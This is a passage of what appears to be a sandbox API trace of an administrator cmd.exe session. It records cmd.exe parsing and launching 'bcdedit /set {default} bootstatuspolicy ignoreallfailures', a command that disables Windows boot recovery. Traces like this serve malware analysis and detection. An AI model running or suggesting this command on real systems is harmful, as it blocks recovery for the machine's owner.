lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c9a, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0150.430] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.430] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.430] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.430] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c9c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0150.430] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.430] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.430] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.430] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c9e, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0150.430] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.430] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.430] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.430] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093ca0, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0150.430] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.430] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.430] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.431] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093ca2, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0150.431] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.431] GetFileType (hFile=0x248) returned 0x3 [0150.431] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.431] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.431] _get_osfhandle (_FileHandle=1) returned 0x254 [0150.431] GetFileType (hFile=0x254) returned 0x3 [0150.431] _get_osfhandle (_FileHandle=1) returned 0x254 [0150.431] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="bcdedit /set {default} bootstatuspolicy ignoreallfailures\n", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcdedit /set {default} bootstatuspolicy ignoreallfailures\n", lpUsedDefaultChar=0x0) returned 59 [0150.431] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x8dc3d4f798, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x8dc3d4f798*=0x3a, lpOverlapped=0x0) returned 1 [0150.431] GetProcessHeap () returned 0x27a547e0000 [0150.431] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x4012) returned 0x27a547e8bb0 [0150.431] GetProcessHeap () returned 0x27a547e0000 [0150.431] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547e8bb0) returned 1 [0150.432] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0150.432] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0150.432] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0150.432] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0150.432] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0150.432] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0150.432] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0150.432] GetProcessHeap () returned 0x27a547e0000 [0150.432] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0xb0) returned 0x27a547e6e30 [0150.432] GetProcessHeap () returned 0x27a547e0000 [0150.432] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x20) returned 0x27a547e6c60 [0150.433] GetProcessHeap () returned 0x27a547e0000 [0150.433] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x76) returned 0x27a547f90f0 [0150.433] GetConsoleOutputCP () returned 0x1b5 [0150.867] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6de08fbb0 | out: lpCPInfo=0x7ff6de08fbb0) returned 1 [0150.867] SetThreadUILanguage (LangId=0x0) returned 0x409 [0151.254] GetConsoleTitleW (in: lpConsoleTitle=0x8dc3d4f5e0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0151.710] malloc (_Size=0xffce) returned 0x27a549d0840 [0151.710] ??_V@YAXPEAX@Z () returned 0x27a549d0840 [0151.711] malloc (_Size=0xffce) returned 0x27a549e0820 [0151.711] ??_V@YAXPEAX@Z () returned 0x27a549e0820 [0151.711] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0151.711] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0151.711] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0151.711] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0151.711] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0151.711] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0151.711] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0151.711] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0151.711] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0151.711] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0151.711] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0151.711] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0151.711] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0151.711] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0151.711] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0151.711] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0151.711] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0151.711] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0151.711] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0151.711] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0151.711] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0151.711] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0151.711] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0151.711] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0151.711] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0151.711] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0151.711] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0151.711] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0151.711] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0151.711] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0151.711] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0151.711] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0151.711] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0151.711] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0151.712] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0151.712] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0151.712] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0151.712] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0151.712] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0151.712] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0151.712] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0151.712] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0151.712] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0151.712] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0151.712] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0151.712] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0151.712] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0151.712] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0151.712] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0151.712] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0151.712] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0151.712] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0151.712] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0151.712] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0151.712] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0151.712] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0151.712] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0151.712] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0151.712] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0151.712] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0151.712] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0151.712] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0151.712] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0151.712] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0151.712] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0151.712] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0151.712] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0151.712] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0151.712] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0151.712] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0151.712] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0151.712] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0151.712] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0151.712] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0151.713] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0151.713] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0151.713] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0151.713] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0151.713] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0151.713] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0151.713] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0151.713] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0151.713] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0151.713] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0151.713] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0151.713] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0151.713] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0151.713] ??_V@YAXPEAX@Z () returned 0x1 [0151.713] GetProcessHeap () returned 0x27a547e0000 [0151.713] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0xffde) returned 0x27a547e8bb0 [0151.714] GetProcessHeap () returned 0x27a547e0000 [0151.714] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x86) returned 0x27a547f9250 [0151.714] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0151.714] malloc (_Size=0xffce) returned 0x27a549e0820 [0151.714] ??_V@YAXPEAX@Z () returned 0x27a549e0820 [0151.714] GetProcessHeap () returned 0x27a547e0000 [0151.714] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x1ffac) returned 0x27a547fb5c0 [0151.716] SetErrorMode (uMode=0x0) returned 0x0 [0151.716] SetErrorMode (uMode=0x1) returned 0x0 [0151.717] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x27a547fb5d0, lpFilePart=0x8dc3d4ee60 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x8dc3d4ee60*="system32") returned 0x13 [0151.717] SetErrorMode (uMode=0x0) returned 0x1 [0151.717] GetProcessHeap () returned 0x27a547e0000 [0151.717] RtlReAllocateHeap (Heap=0x27a547e0000, Flags=0x0, Ptr=0x27a547fb5c0, Size=0x48) returned 0x27a547fb5c0 [0151.717] GetProcessHeap () returned 0x27a547e0000 [0151.717] RtlSizeHeap (HeapHandle=0x27a547e0000, Flags=0x0, MemoryPointer=0x27a547fb5c0) returned 0x48 [0151.717] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0151.717] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0151.717] GetProcessHeap () returned 0x27a547e0000 [0151.717] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x1b4) returned 0x27a547f8ba0 [0151.717] GetProcessHeap () returned 0x27a547e0000 [0151.717] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x358) returned 0x27a547f8d60 [0151.717] GetProcessHeap () returned 0x27a547e0000 [0151.717] RtlReAllocateHeap (Heap=0x27a547e0000, Flags=0x0, Ptr=0x27a547f8d60, Size=0x1b6) returned 0x27a547f8d60 [0151.717] GetProcessHeap () returned 0x27a547e0000 [0151.717] RtlSizeHeap (HeapHandle=0x27a547e0000, Flags=0x0, MemoryPointer=0x27a547f8d60) returned 0x1b6 [0151.717] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0151.717] GetProcessHeap () returned 0x27a547e0000 [0151.717] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0xe8) returned 0x27a547f8f30 [0151.717] GetProcessHeap () returned 0x27a547e0000 [0151.717] RtlReAllocateHeap (Heap=0x27a547e0000, Flags=0x0, Ptr=0x27a547f8f30, Size=0x7e) returned 0x27a547f8f30 [0151.717] GetProcessHeap () returned 0x27a547e0000 [0151.717] RtlSizeHeap (HeapHandle=0x27a547e0000, Flags=0x0, MemoryPointer=0x27a547f8f30) returned 0x7e [0151.717] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0151.717] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x8dc3d4ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8dc3d4ebd0) returned 0x27a547f92e0 [0151.717] FindClose (in: hFindFile=0x27a547f92e0 | out: hFindFile=0x27a547f92e0) returned 1 [0151.718] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x8dc3d4ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8dc3d4ebd0) returned 0xffffffffffffffff [0151.718] GetLastError () returned 0x2 [0151.718] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x8dc3d4ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8dc3d4ebd0) returned 0x27a547f92e0 [0151.718] FindClose (in: hFindFile=0x27a547f92e0 | out: hFindFile=0x27a547f92e0) returned 1 [0151.718] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0151.718] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0151.718] ??_V@YAXPEAX@Z () returned 0x1 [0151.718] GetConsoleTitleW (in: lpConsoleTitle=0x8dc3d4f150, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0151.857] GetProcessHeap () returned 0x27a547e0000 [0151.857] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x21c) returned 0x27a547f94f0 [0151.857] GetConsoleTitleW (in: lpConsoleTitle=0x27a547f9500, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0152.145] GetProcessHeap () returned 0x27a547e0000 [0152.145] RtlReAllocateHeap (Heap=0x27a547e0000, Flags=0x0, Ptr=0x27a547f94f0, Size=0xee) returned 0x27a547f94f0 [0152.145] GetProcessHeap () returned 0x27a547e0000 [0152.145] RtlSizeHeap (HeapHandle=0x27a547e0000, Flags=0x0, MemoryPointer=0x27a547f94f0) returned 0xee [0152.145] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe - bcdedit /set {default} bootstatuspolicy ignoreallfailures") returned 1 [0152.367] GetProcessHeap () returned 0x27a547e0000 [0152.367] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547f94f0) returned 1 [0152.367] InitializeProcThreadAttributeList (in: lpAttributeList=0x8dc3d4f070, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x8dc3d4ef60 | out: lpAttributeList=0x8dc3d4f070, lpSize=0x8dc3d4ef60) returned 1 [0152.367] UpdateProcThreadAttribute (in: lpAttributeList=0x8dc3d4f070, dwFlags=0x0, Attribute=0x60001, lpValue=0x8dc3d4ef4c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x8dc3d4f070, lpPreviousValue=0x0) returned 1 [0152.367] GetStartupInfoW (in: lpStartupInfo=0x8dc3d4f000 | out: lpStartupInfo=0x8dc3d4f000*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x248, hStdOutput=0x254, hStdError=0x254)) [0152.367] GetProcessHeap () returned 0x27a547e0000 [0152.367] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x20) returned 0x27a547e6ef0 [0152.367] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0152.367] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0152.367] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0152.367] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0152.367] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0152.367] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0152.367] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0152.367] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0152.367] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0152.367] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0152.367] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0152.367] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0152.367] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0152.367] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0152.367] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0152.367] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0152.367] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0152.367] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0152.367] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0152.367] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0152.368] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0152.368] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0152.368] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0152.368] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0152.368] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0152.368] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0152.368] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0152.368] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0152.368] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0152.368] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0152.368] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0152.368] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0152.368] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0152.368] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0152.368] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0152.368] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0152.368] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0152.368] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0152.368] GetProcessHeap () returned 0x27a547e0000 [0152.368] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547e6ef0) returned 1 [0152.368] GetProcessHeap () returned 0x27a547e0000 [0152.368] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x12) returned 0x27a547e6ef0 [0152.368] _get_osfhandle (_FileHandle=1) returned 0x254 [0152.368] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0152.368] _get_osfhandle (_FileHandle=0) returned 0x248 [0152.368] SetConsoleMode (hConsoleHandle=0x248, dwMode=0x0) returned 0 [0152.368] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\bcdedit.exe", lpCommandLine="bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\WINDOWS\\system32", lpStartupInfo=0x8dc3d4ef90*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit /set {default} bootstatuspolicy ignoreallfailures", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x8dc3d4ef68 | out: lpCommandLine="bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x8dc3d4ef68*(hProcess=0x98, hThread=0x94, dwProcessId=0x38c, dwThreadId=0xa80)) returned 1 [0152.754] CloseHandle (hObject=0x94) returned 1 [0152.754] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0152.754] GetProcessHeap () returned 0x27a547e0000 [0152.754] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547faac0) returned 1 [0152.754] GetEnvironmentStringsW () returned 0x27a547faac0* [0152.754] GetProcessHeap () returned 0x27a547e0000 [0152.754] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0xaea) returned 0x27a547e5930 [0152.754] FreeEnvironmentStringsA (penv="=") returned 1 [0152.754] NtQueryInformationProcess (in: ProcessHandle=0x98, ProcessInformationClass=0x0, ProcessInformation=0x8dc3d4e468, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x8dc3d4e468, ReturnLength=0x0) returned 0x0 [0152.754] ReadProcessMemory (in: hProcess=0x98, lpBaseAddress=0x2061db0000, lpBuffer=0x8dc3d4e4a0, nSize=0x7a0, lpNumberOfBytesRead=0x8dc3d4e460 | out: lpBuffer=0x8dc3d4e4a0*, lpNumberOfBytesRead=0x8dc3d4e460*=0x7a0) returned 1 [0152.754] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) Thread: id = 99 os_tid = 0xf88 Process: id = "14" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x5a1a9000" os_pid = "0xf38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0xf00" cmd_line = "\"C:\\WINDOWS\\system32\\cmd.exe\"" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000129f0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 83 os_tid = 0xf3c [0135.804] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff6de050000 [0135.804] __set_app_type (_Type=0x1) [0135.804] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff6de066d00) returned 0x0 [0135.805] __getmainargs (in: _Argc=0x7ff6de089200, _Argv=0x7ff6de089208, _Env=0x7ff6de089210, _DoWildCard=0, _StartInfo=0x7ff6de08921c | out: _Argc=0x7ff6de089200, _Argv=0x7ff6de089208, _Env=0x7ff6de089210) returned 0 [0135.805] _onexit (_Func=0x7ff6de067fd0) returned 0x7ff6de067fd0 [0135.805] _onexit (_Func=0x7ff6de067fe0) returned 0x7ff6de067fe0 [0135.805] _onexit (_Func=0x7ff6de067ff0) returned 